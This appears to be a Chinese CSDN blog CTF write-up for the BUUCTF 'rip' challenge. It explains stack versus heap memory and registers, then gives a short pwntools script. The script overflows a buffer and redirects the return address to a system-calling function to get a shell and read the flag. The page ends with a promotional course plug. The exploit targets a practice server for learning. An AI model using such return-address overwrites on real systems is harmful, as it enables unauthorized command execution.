【CTF】rip--堆栈的简单认识_ctf rip

命令执行函数就是fun()方法,调用system函数,可以远控服务器

在这里插入图片描述

fun()的地址为0x401186,只要使栈溢出,使return返回的是fun()的地址,就能触发命令执行

在这里插入图片描述

栈溢出和堆溢出是两种不同的情况,以下是对栈和堆的简单区分:

  • stack(栈)由操作系统自动分配释放 ,用于存放函数的参数值、局部变量等
  • Heap负责存储动态分配的内存空间,如c语言中的malloc/free分配内存时,就会分配到Heap区域

在这里插入图片描述

64位CPU对应寄存器
● RSP(栈顶,低地址)
● RBP(栈底,高地址)
● RIP(当前栈栈帧执行的命令)
32位CPU对应寄存器
● ESP(栈顶)
● EBP(栈底)
● EIP(当前栈栈帧执行的命令)


结合图可以看出,Stack(栈)先进后出(从高地址往低地址开辟内存空间),Heap(堆)先进先出的特点(从低地址往高地址开辟内存空间),中间的shared libraries是堆和栈是共享的一片内存空间

先写出payload:

from pwn import \*;

p =remote('node5.buuoj.cn',27090)
payload = b'C'\*15 + b'D'\*8 + p64(0x401186+1)
p.sendline(payload);
p.interactive()

整个payload意图就是导致栈溢出到指定位置,再传入fun()的地址0x401186就能导致命令执行,+1则是为了维持堆栈平衡,这个在本地是不需要的,在远程服务器则需要。
至此,我们就能连接远程服务器,cat flag

在这里插入图片描述

flag{ab21f884-ecef-4f2a-88fa-70d7b0b96549}

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值